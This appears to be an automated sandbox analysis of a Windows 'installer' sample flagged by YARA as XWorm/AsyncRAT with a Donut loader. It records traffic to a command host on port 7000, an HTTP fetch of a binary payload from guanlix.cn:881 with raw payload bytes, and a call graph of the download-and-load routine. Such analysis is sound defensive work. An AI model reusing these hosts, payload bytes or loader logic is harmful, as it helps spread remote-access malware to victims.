                Jul 2, 2024 19:27:39.632320881 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:39.645514965 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:39.650672913 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:39.675426960 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:39.680233002 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:39.768076897 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:39.772955894 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:39.783592939 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:39.788636923 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.030881882 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.033092022 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.037879944 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.258569002 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.261008024 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.265783072 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.265830994 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.270708084 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.270752907 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.276053905 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.485954046 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.487962961 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.492826939 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:40.492872000 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:40.497776031 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:44.080440044 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:44.085414886 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:44.403132915 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:44.406734943 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:44.415656090 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:50.409497023 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:50.455238104 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:56.049505949 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:56.054461002 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:56.221139908 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:56.226042032 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:56.378530025 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:56.410558939 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:56.415404081 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:56.606772900 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:56.617119074 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:56.622124910 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:57.611833096 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:57.616740942 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:57.935606956 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:57.937938929 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:57.943243027 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:59.455722094 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:59.460613012 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:59.778711081 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:27:59.914928913 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:27:59.920125961 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:02.768079042 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:02.773993015 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:02.799242020 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:02.804910898 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:02.908601999 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:02.913655043 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.091639042 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.093528032 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:03.098421097 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.320506096 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.322654009 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:03.327424049 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.548016071 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.627213955 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:03.686772108 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:03.692533970 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:03.699239016 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:03.706032991 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:04.061886072 CEST700049731117.41.184.33192.168.2.4
                Jul 2, 2024 19:28:04.062989950 CEST497317000192.168.2.4117.41.184.33
                Jul 2, 2024 19:28:04.068141937 CEST700049731117.41.184.33192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 19:23:57.804954052 CEST5625353192.168.2.41.1.1.1
                Jul 2, 2024 19:23:58.214560032 CEST53562531.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 2, 2024 19:23:57.804954052 CEST192.168.2.41.1.1.10xc0a4Standard query (0)guanlix.cnA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 2, 2024 19:23:58.214560032 CEST1.1.1.1192.168.2.40xc0a4No error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
                • guanlix.cn:881
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.44973091.208.240.1578816556C:\Users\user\Desktop\33__Installer.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 19:23:58.230568886 CEST94OUTGET /330.ccp HTTP/1.1
                User-Agent: Download
                Host: guanlix.cn:881
                Cache-Control: no-cache
                Jul 2, 2024 19:23:59.166776896 CEST1236INHTTP/1.1 200 OK
                Server: nginx/1.26.1
                Date: Tue, 02 Jul 2024 17:23:42 GMT
                Content-Type: application/octet-stream
                Content-Length: 71938
                Last-Modified: Wed, 12 Jun 2024 10:07:44 GMT
                Connection: keep-alive
                ETag: "66697370-11902"
                Accept-Ranges: bytes
                Data Raw: e8 88 bb 00 00 88 bb 00 00 58 6d fb 30 4e 7e 88 32 a2 6f 69 d3 f9 fa 9a de 2f 3a c5 c9 ab 23 45 fc ba f0 f2 a1 14 af 35 d5 00 00 00 00 72 d9 9a f4 56 15 83 7f 51 7f 5a 06 d3 a2 08 d5 c4 78 e4 ff 0d 47 a9 16 dd 99 d1 0c f7 ed 32 fd 17 06 ba cc 7c 27 cd 13 e0 cc a7 f0 a1 1a 42 09 75 fb 8a fd 5c ed d7 8f f9 64 23 f4 82 cc 3e 98 03 b5 94 ca 48 e1 dd 6e 27 f7 a4 ef b9 48 34 6e c9 db fe 57 ed ca b3 14 ff c2 bf 03 a0 6b e0 ef 3e da d5 95 a1 57 34 c2 8a e0 91 b8 e0 1e 77 84 18 4a a1 1f ae 5a 97 f2 ac 24 40 05 a3 e4 8c 84 2f bd d8 fb 8e 4d 3f 13 a7 3d 6f a6 13 ac 27 e9 83 b0 7a 1b da ed fb b0 24 e3 2e a3 c2 25 00 a0 83 d3 b9 59 bc 2e 22 14 29 0a 7c 94 3f e1 51 f3 3a 75 a6 5d 6c c0 c7 8c c7 c5 4c e6 47 50 1a 66 d7 8e b6 bd 2f 4c 89 69 7a 56 cc cf 6e c4 48 76 85 0e d7 7b 0a 55 61 90 78 e7 7f 42 56 95 4f 53 d5 16 a6 f7 7c 99 24 3b 8c f0 40 61 60 d2 d7 5f 16 05 bf f1 ae 8e 0b a2 9f d5 7d d9 df a3 f5 c7 6b 08 8c f3 b2 e2 4d e8 ee 27 28 1c 81 1d d8 be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: Xm0N~2oi/:#E5rVQZxG2|'Bu\d#>Hn'H4nWk>W4wJZ$@/M?=o'z$.%Y.")|?Q:u]lLGPf/LizVnHv{UaxBVOS|$;@a`_}kM'((jYY2IPZPk<ATHYZIp37\<m`w(gw!)@{3h"l=jzZ^TVk^[WJ\s>WyNn"jXBdZLx {J1_\<p.NoND?=/Nr*X<8:PHMOt^|"XE?iI'g]Ek(E]F,A}?tQ }5l\TT$NfHP9#3qKox~.kkhN;<_rm{oRp?-E


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Target ID:0
                Start time:13:23:56
                Start date:02/07/2024
                Path:C:\Users\user\Desktop\33__Installer.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\33__Installer.exe"
                Imagebase:0xc20000
                File size:247'808 bytes
                MD5 hash:8182ED62008E7526AE7E1F7D702FBCB6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:10.9%
                  Dynamic/Decrypted Code Coverage:13.1%
                  Signature Coverage:2.9%
                  Total number of Nodes:647
                  Total number of Limit Nodes:87
                  execution_graph 25018 c263e4 25068 c2af90 25018->25068 25020 c263f0 GetStartupInfoW 25021 c26404 HeapSetInformation 25020->25021 25023 c2640f 25020->25023 25021->25023 25069 c2b221 HeapCreate 25023->25069 25024 c2645d 25025 c26468 25024->25025 25084 c263bb 66 API calls 3 library calls 25024->25084 25085 c29f39 86 API calls 4 library calls 25025->25085 25028 c2646e 25029 c26472 25028->25029 25030 c2647a __RTC_Initialize 25028->25030 25086 c263bb 66 API calls 3 library calls 25029->25086 25070 c2b47e 73 API calls __calloc_crt 25030->25070 25032 c26479 25032->25030 25034 c26487 25035 c26493 GetCommandLineA 25034->25035 25036 c2648b 25034->25036 25071 c2d463 71 API calls 2 library calls 25035->25071 25087 c2bbff 66 API calls 3 library calls 25036->25087 25040 c264a3 25088 c2d3a8 95 API calls 3 library calls 25040->25088 25042 c264ad 25043 c264b1 25042->25043 25044 c264b9 25042->25044 25089 c2bbff 66 API calls 3 library calls 25043->25089 25072 c2d132 94 API calls 7 library calls 25044->25072 25048 c264be 25049 c264c2 25048->25049 25050 c264ca 25048->25050 25090 c2bbff 66 API calls 3 library calls 25049->25090 25073 c2b9de 77 API calls 4 library calls 25050->25073 25054 c264d1 25055 c264d6 25054->25055 25056 c264dd 25054->25056 25091 c2bbff 66 API calls 3 library calls 25055->25091 25074 c2d0d3 94 API calls 2 library calls 25056->25074 25059 c264e2 25061 c264e8 25059->25061 25075 c23a70 25059->25075 25061->25059 25064 c2650c 25093 c2bbe1 66 API calls _doexit 25064->25093 25067 c26511 __alloc_osfhnd 25068->25020 25069->25024 25070->25034 25071->25040 25072->25048 25073->25054 25074->25059 25094 c211e0 25075->25094 25084->25025 25085->25028 25086->25032 25088->25042 25092 c2bbb5 66 API calls _doexit 25092->25064 25093->25067 25138 c24caa GetSystemTimeAsFileTime 25094->25138 25096 c211e8 25140 c24d74 25096->25140 25098 c211ee 25099 c24d86 66 API calls _rand 25098->25099 25100 c21203 VirtualAlloc 25098->25100 25099->25098 25101 c23910 25100->25101 25170 c26390 25101->25170 25104 c23950 InternetOpenUrlA 25106 c23971 25104->25106 25107 c23a4c InternetCloseHandle 25104->25107 25105 c23a54 VirtualFree 25123 c21740 25105->25123 25172 c236a0 25106->25172 25107->25105 25110 c23a23 InternetCloseHandle 25203 c23800 116 API calls 25110->25203 25111 c23997 InternetReadFile 25113 c239b5 25111->25113 25114 c239e8 25111->25114 25113->25114 25186 c22c10 25113->25186 25196 c23500 25114->25196 25116 c23a39 25204 c24301 EnterCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor std::ios_base::_Tidy ctype 25116->25204 25120 c23a49 25120->25107 25124 c21745 25123->25124 25126 c21767 25124->25126 25130 c217a7 25124->25130 25761 c24da7 99 API calls 8 library calls 25124->25761 25128 c21784 25126->25128 25762 c24da7 99 API calls 8 library calls 25126->25762 25128->25130 25763 c24da7 99 API calls 8 library calls 25128->25763 25131 c21210 GetTickCount64 Sleep GetTickCount64 25130->25131 25764 c24e4e 25131->25764 25133 c21261 CreateFileA GetFileSize VirtualAlloc ReadFile CloseHandle 25136 c212ba 25133->25136 25135 c24e4e 99 API calls 25137 c2125e 25135->25137 25136->25064 25136->25092 25137->25133 25139 c24cda __aulldiv 25138->25139 25139->25096 25143 c29df0 25140->25143 25148 c29d77 GetLastError 25143->25148 25145 c29df8 25146 c24d7e 25145->25146 25163 c2bbff 66 API calls 3 library calls 25145->25163 25146->25098 25164 c29c52 TlsGetValue 25148->25164 25151 c29d96 25167 c26e0d 66 API calls __calloc_crt 25151->25167 25152 c29de4 SetLastError 25152->25145 25154 c29da2 25154->25152 25155 c29daa DecodePointer 25154->25155 25156 c29dbf 25155->25156 25157 c29dc3 25156->25157 25158 c29ddb 25156->25158 25168 c29cc3 66 API calls 4 library calls 25157->25168 25169 c24e7c 66 API calls 2 library calls 25158->25169 25161 c29dcb GetCurrentThreadId 25161->25152 25162 c29de1 25162->25152 25165 c29c82 25164->25165 25166 c29c67 DecodePointer TlsSetValue 25164->25166 25165->25151 25165->25152 25166->25165 25167->25154 25168->25161 25169->25162 25171 c23932 InternetOpenA 25170->25171 25171->25104 25171->25105 25173 c236cc 25172->25173 25205 c21630 25173->25205 25175 c236fe 25217 c22810 25175->25217 25178 c23730 25226 c21fe0 25178->25226 25183 c237e4 25183->25110 25183->25111 25184 c237c2 25184->25183 25253 c21500 67 API calls 2 library calls 25184->25253 25187 c22c4b 25186->25187 25188 c22c6f 25187->25188 25674 c22440 67 API calls 25187->25674 25190 c22c89 25188->25190 25670 c21a10 25188->25670 25192 c22d1b 25190->25192 25675 c21500 67 API calls 2 library calls 25190->25675 25194 c22d32 InternetReadFile 25192->25194 25676 c227c0 67 API calls 25192->25676 25194->25113 25194->25114 25197 c2350e 25196->25197 25201 c23522 25196->25201 25754 c22fa0 25197->25754 25199 c23513 25200 c26312 __fcloseall 102 API calls 25199->25200 25200->25201 25201->25110 25202 c21500 67 API calls 2 library calls 25201->25202 25202->25110 25203->25116 25204->25120 25254 c21500 67 API calls 2 library calls 25205->25254 25207 c2166a 25255 c24eb6 25207->25255 25210 c216b3 25210->25175 25212 c2167f 25268 c23c83 25212->25268 25216 c216a9 25216->25175 25307 c21170 25217->25307 25222 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25223 c22860 25222->25223 25224 c23cab _tidy_global LeaveCriticalSection 25223->25224 25225 c22882 25224->25225 25225->25178 25252 c21500 67 API calls 2 library calls 25225->25252 25337 c2452e 25226->25337 25229 c24eb6 std::locale::_Init 77 API calls 25230 c2201e 25229->25230 25231 c22054 25230->25231 25342 c23f8f 82 API calls 8 library calls 25230->25342 25237 c22ad0 25231->25237 25233 c2202d 25234 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25233->25234 25235 c22040 25234->25235 25236 c23cab _tidy_global LeaveCriticalSection 25235->25236 25236->25231 25238 c22af6 25237->25238 25239 c22b8b 25237->25239 25344 c24638 25238->25344 25239->25184 25241 c22b07 25241->25239 25354 c21310 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25241->25354 25243 c22b23 25355 c228b0 87 API calls 5 library calls 25243->25355 25245 c22b30 25246 c22b42 25245->25246 25247 c22b65 25245->25247 25356 c210d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25246->25356 25357 c210d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25247->25357 25249 c22b51 25249->25184 25251 c22b77 25251->25184 25252->25178 25253->25183 25254->25207 25257 c24ec0 25255->25257 25258 c21671 25257->25258 25260 c24edc std::exception::exception 25257->25260 25276 c27cb1 25257->25276 25293 c2b24e DecodePointer 25257->25293 25258->25210 25267 c23f8f 82 API calls 8 library calls 25258->25267 25266 c24f1a 25260->25266 25294 c26fca 76 API calls __cinit 25260->25294 25262 c24f24 25296 c24f36 RaiseException 25262->25296 25265 c24f35 25295 c247f2 66 API calls std::exception::operator= 25266->25295 25267->25212 25269 c23c95 25268->25269 25271 c21692 25268->25271 25305 c24668 EnterCriticalSection 25269->25305 25272 c23cab 25271->25272 25273 c23cb2 25272->25273 25274 c23cc0 25272->25274 25306 c24678 LeaveCriticalSection 25273->25306 25274->25216 25277 c27d2e 25276->25277 25282 c27cbf 25276->25282 25303 c2b24e DecodePointer 25277->25303 25279 c27cca 25279->25282 25297 c2cf50 66 API calls __NMSG_WRITE 25279->25297 25298 c2cda1 66 API calls 6 library calls 25279->25298 25299 c2b95d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25279->25299 25280 c27d34 25304 c2af3f 66 API calls __getptd_noexit 25280->25304 25282->25279 25284 c27ced RtlAllocateHeap 25282->25284 25287 c27d1a 25282->25287 25291 c27d18 25282->25291 25300 c2b24e DecodePointer 25282->25300 25284->25282 25285 c27d26 25284->25285 25285->25257 25301 c2af3f 66 API calls __getptd_noexit 25287->25301 25302 c2af3f 66 API calls __getptd_noexit 25291->25302 25293->25257 25294->25266 25295->25262 25296->25265 25297->25279 25298->25279 25300->25282 25301->25291 25302->25285 25303->25280 25304->25285 25305->25271 25306->25274 25308 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25307->25308 25309 c21191 25308->25309 25310 c23cab _tidy_global LeaveCriticalSection 25309->25310 25311 c211a5 25310->25311 25312 c22230 25311->25312 25313 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25312->25313 25314 c22258 25313->25314 25315 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25314->25315 25318 c2229c 25314->25318 25316 c2227b 25315->25316 25317 c23cab _tidy_global LeaveCriticalSection 25316->25317 25317->25318 25332 c222dc 25318->25332 25333 c21e70 87 API calls 2 library calls 25318->25333 25319 c23cab _tidy_global LeaveCriticalSection 25320 c2234c 25319->25320 25320->25222 25320->25225 25322 c222ea 25323 c2230d 25322->25323 25334 c247c9 66 API calls std::exception::exception 25322->25334 25324 c23c83 std::_Lockit::_Lockit EnterCriticalSection 25323->25324 25326 c22320 25324->25326 25329 c23cab _tidy_global LeaveCriticalSection 25326->25329 25327 c222ff 25335 c24f36 RaiseException 25327->25335 25330 c22334 25329->25330 25336 c23cd7 77 API calls std::locale::_Init 25330->25336 25332->25319 25333->25322 25334->25327 25335->25323 25336->25332 25338 c24eb6 std::locale::_Init 77 API calls 25337->25338 25339 c2453a 25338->25339 25343 c24648 InitializeCriticalSection 25339->25343 25341 c22010 25341->25229 25342->25233 25343->25341 25346 c24590 25344->25346 25345 c245db 25345->25241 25346->25345 25347 c245f5 25346->25347 25350 c24571 std::_Xfsopen 143 API calls 25346->25350 25353 c245fc 25347->25353 25358 c24571 25347->25358 25350->25347 25353->25345 25361 c26312 25353->25361 25354->25243 25355->25245 25356->25249 25357->25251 25375 c27e8d 25358->25375 25360 c2458b 25360->25345 25374 c27fd3 101 API calls 6 library calls 25360->25374 25362 c2631e __alloc_osfhnd 25361->25362 25363 c26330 25362->25363 25364 c26345 25362->25364 25538 c2af3f 66 API calls __getptd_noexit 25363->25538 25373 c26340 __alloc_osfhnd 25364->25373 25516 c25af4 25364->25516 25367 c26335 25539 c2aeed 11 API calls __strnicmp_l 25367->25539 25373->25345 25374->25353 25378 c27e99 __alloc_osfhnd 25375->25378 25376 c27eac 25433 c2af3f 66 API calls __getptd_noexit 25376->25433 25378->25376 25380 c27ed9 25378->25380 25379 c27eb1 25434 c2aeed 11 API calls __strnicmp_l 25379->25434 25394 c31ac3 25380->25394 25383 c27ede 25384 c27ef2 25383->25384 25385 c27ee5 25383->25385 25387 c27f19 25384->25387 25388 c27ef9 25384->25388 25435 c2af3f 66 API calls __getptd_noexit 25385->25435 25411 c3182c 25387->25411 25436 c2af3f 66 API calls __getptd_noexit 25388->25436 25390 c27ebc __alloc_osfhnd @_EH4_CallFilterFunc@8 25390->25360 25395 c31acf __alloc_osfhnd 25394->25395 25438 c2bd97 25395->25438 25397 c31b59 25477 c26dc8 25397->25477 25398 c31b52 25445 c31bed 25398->25445 25402 c31be2 __alloc_osfhnd 25402->25383 25403 c31b6e InitializeCriticalSectionAndSpinCount 25404 c31ba1 EnterCriticalSection 25403->25404 25405 c31b8e 25403->25405 25404->25398 25483 c24e7c 66 API calls 2 library calls 25405->25483 25409 c31add 25409->25397 25409->25398 25448 c2bcd5 25409->25448 25475 c25b35 67 API calls __lock 25409->25475 25476 c25ba3 LeaveCriticalSection LeaveCriticalSection _doexit 25409->25476 25412 c3184e 25411->25412 25413 c31862 25412->25413 25425 c31879 25412->25425 25497 c2af3f 66 API calls __getptd_noexit 25413->25497 25414 c31a16 25417 c31a6a 25414->25417 25418 c31a7c 25414->25418 25416 c31867 25498 c2aeed 11 API calls __strnicmp_l 25416->25498 25503 c2af3f 66 API calls __getptd_noexit 25417->25503 25494 c35645 25418->25494 25422 c31a6f 25504 c2aeed 11 API calls __strnicmp_l 25422->25504 25423 c27f24 25437 c27f3f LeaveCriticalSection LeaveCriticalSection _fgetc 25423->25437 25425->25414 25425->25417 25499 c359cf 76 API calls __fassign 25425->25499 25427 c319e5 25427->25417 25500 c35869 85 API calls __mbsnbicmp_l 25427->25500 25429 c31a0f 25429->25414 25501 c35869 85 API calls __mbsnbicmp_l 25429->25501 25431 c31a2e 25431->25414 25502 c35869 85 API calls __mbsnbicmp_l 25431->25502 25433->25379 25434->25390 25435->25390 25436->25390 25437->25390 25439 c2bdbf EnterCriticalSection 25438->25439 25440 c2bdac 25438->25440 25439->25409 25441 c2bcd5 __mtinitlocknum 65 API calls 25440->25441 25442 c2bdb2 25441->25442 25442->25439 25484 c2bbff 66 API calls 3 library calls 25442->25484 25485 c2bcbe LeaveCriticalSection 25445->25485 25447 c31bf4 25447->25402 25449 c2bce1 __alloc_osfhnd 25448->25449 25450 c2bcf1 25449->25450 25451 c2bd09 25449->25451 25486 c2cf50 66 API calls __NMSG_WRITE 25450->25486 25453 c26dc8 __malloc_crt 65 API calls 25451->25453 25459 c2bd17 __alloc_osfhnd 25451->25459 25455 c2bd22 25453->25455 25454 c2bcf6 25487 c2cda1 66 API calls 6 library calls 25454->25487 25457 c2bd38 25455->25457 25458 c2bd29 25455->25458 25462 c2bd97 __lock 65 API calls 25457->25462 25489 c2af3f 66 API calls __getptd_noexit 25458->25489 25459->25409 25460 c2bcfd 25488 c2b95d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25460->25488 25464 c2bd3f 25462->25464 25466 c2bd72 25464->25466 25467 c2bd47 InitializeCriticalSectionAndSpinCount 25464->25467 25492 c24e7c 66 API calls 2 library calls 25466->25492 25469 c2bd57 25467->25469 25470 c2bd63 25467->25470 25490 c24e7c 66 API calls 2 library calls 25469->25490 25493 c2bd8e LeaveCriticalSection _doexit 25470->25493 25473 c2bd5d 25491 c2af3f 66 API calls __getptd_noexit 25473->25491 25475->25409 25476->25409 25479 c26dd1 25477->25479 25478 c27cb1 _malloc 65 API calls 25478->25479 25479->25478 25480 c26e07 25479->25480 25481 c26de8 Sleep 25479->25481 25480->25398 25480->25403 25482 c26dfd 25481->25482 25482->25479 25482->25480 25483->25398 25485->25447 25486->25454 25487->25460 25489->25459 25490->25473 25491->25470 25492->25470 25493->25459 25505 c35581 25494->25505 25496 c35660 25496->25423 25497->25416 25498->25423 25499->25427 25500->25429 25501->25431 25502->25414 25503->25422 25504->25423 25508 c3558d __alloc_osfhnd 25505->25508 25506 c355a0 25507 c2af3f __tolower_l 66 API calls 25506->25507 25509 c355a5 25507->25509 25508->25506 25510 c355d6 25508->25510 25511 c2aeed __strnicmp_l 11 API calls 25509->25511 25512 c34e4d __tsopen_nolock 129 API calls 25510->25512 25515 c355af __alloc_osfhnd 25511->25515 25513 c355f0 25512->25513 25514 c35617 __wsopen_helper LeaveCriticalSection 25513->25514 25514->25515 25515->25496 25517 c25b06 25516->25517 25518 c25b28 EnterCriticalSection 25516->25518 25517->25518 25519 c25b0e 25517->25519 25520 c25b1e 25518->25520 25521 c2bd97 __lock 66 API calls 25519->25521 25522 c262a5 25520->25522 25521->25520 25523 c262b6 25522->25523 25524 c262ca 25522->25524 25547 c2af3f 66 API calls __getptd_noexit 25523->25547 25526 c262c6 25524->25526 25541 c25bd2 25524->25541 25540 c2637e LeaveCriticalSection LeaveCriticalSection _fgetc 25526->25540 25527 c262bb 25548 c2aeed 11 API calls __strnicmp_l 25527->25548 25532 c262de 25550 c2b6c3 25532->25550 25534 c262e4 25557 c2cc67 72 API calls 7 library calls 25534->25557 25536 c262ea 25536->25526 25558 c24e7c 66 API calls 2 library calls 25536->25558 25538->25367 25539->25373 25540->25373 25542 c25c0d 25541->25542 25543 c25beb 25541->25543 25549 c2c674 66 API calls _free 25542->25549 25543->25542 25544 c2b6c3 __flsbuf 66 API calls 25543->25544 25545 c25c06 25544->25545 25559 c2c4c7 25545->25559 25547->25527 25548->25526 25549->25532 25551 c2b6e4 25550->25551 25552 c2b6cf 25550->25552 25551->25534 25668 c2af3f 66 API calls __getptd_noexit 25552->25668 25554 c2b6d4 25669 c2aeed 11 API calls __strnicmp_l 25554->25669 25556 c2b6df 25556->25534 25557->25536 25558->25526 25560 c2c4d3 __alloc_osfhnd 25559->25560 25561 c2c4f6 25560->25561 25562 c2c4db 25560->25562 25564 c2c502 25561->25564 25569 c2c53c 25561->25569 25660 c2af52 66 API calls __getptd_noexit 25562->25660 25662 c2af52 66 API calls __getptd_noexit 25564->25662 25565 c2c4e0 25661 c2af3f 66 API calls __getptd_noexit 25565->25661 25568 c2c507 25663 c2af3f 66 API calls __getptd_noexit 25568->25663 25584 c34395 25569->25584 25571 c2c4e8 __alloc_osfhnd 25571->25542 25573 c2c542 25575 c2c550 25573->25575 25576 c2c564 25573->25576 25574 c2c50f 25664 c2aeed 11 API calls __strnicmp_l 25574->25664 25594 c2bdca 25575->25594 25665 c2af3f 66 API calls __getptd_noexit 25576->25665 25580 c2c55c 25667 c2c593 LeaveCriticalSection __unlock_fhandle 25580->25667 25581 c2c569 25666 c2af52 66 API calls __getptd_noexit 25581->25666 25585 c343a1 __alloc_osfhnd 25584->25585 25586 c343fb 25585->25586 25587 c2bd97 __lock 66 API calls 25585->25587 25588 c34400 EnterCriticalSection 25586->25588 25589 c3441d __alloc_osfhnd 25586->25589 25590 c343cd 25587->25590 25588->25589 25589->25573 25591 c343d6 InitializeCriticalSectionAndSpinCount 25590->25591 25592 c343e9 25590->25592 25591->25592 25593 c3442b ___lock_fhandle LeaveCriticalSection 25592->25593 25593->25586 25595 c2bdd9 __ftelli64_nolock 25594->25595 25596 c2be2e 25595->25596 25597 c2be0f 25595->25597 25629 c2be04 25595->25629 25601 c2be8a 25596->25601 25602 c2be6d 25596->25602 25599 c2af52 __read_nolock 66 API calls 25597->25599 25598 c26fe1 __crtGetLocaleInfoA_stat 5 API calls 25600 c2c4c5 25598->25600 25603 c2be14 25599->25603 25600->25580 25605 c2bea0 25601->25605 25606 c2be91 25601->25606 25604 c2af52 __read_nolock 66 API calls 25602->25604 25607 c2af3f __tolower_l 66 API calls 25603->25607 25609 c2be72 25604->25609 25608 c32877 __flsbuf 66 API calls 25605->25608 25610 c2ca5c __lseeki64_nolock 68 API calls 25606->25610 25611 c2be1b 25607->25611 25613 c2bea6 25608->25613 25614 c2af3f __tolower_l 66 API calls 25609->25614 25615 c2be9d 25610->25615 25612 c2aeed __strnicmp_l 11 API calls 25611->25612 25612->25629 25616 c2c148 25613->25616 25621 c29df0 __getptd 66 API calls 25613->25621 25617 c2be7a 25614->25617 25615->25605 25619 c2c157 25616->25619 25620 c2c3f8 WriteFile 25616->25620 25618 c2aeed __strnicmp_l 11 API calls 25617->25618 25618->25629 25622 c2c212 25619->25622 25631 c2c16a 25619->25631 25624 c2c12a 25620->25624 25625 c2c42b GetLastError 25620->25625 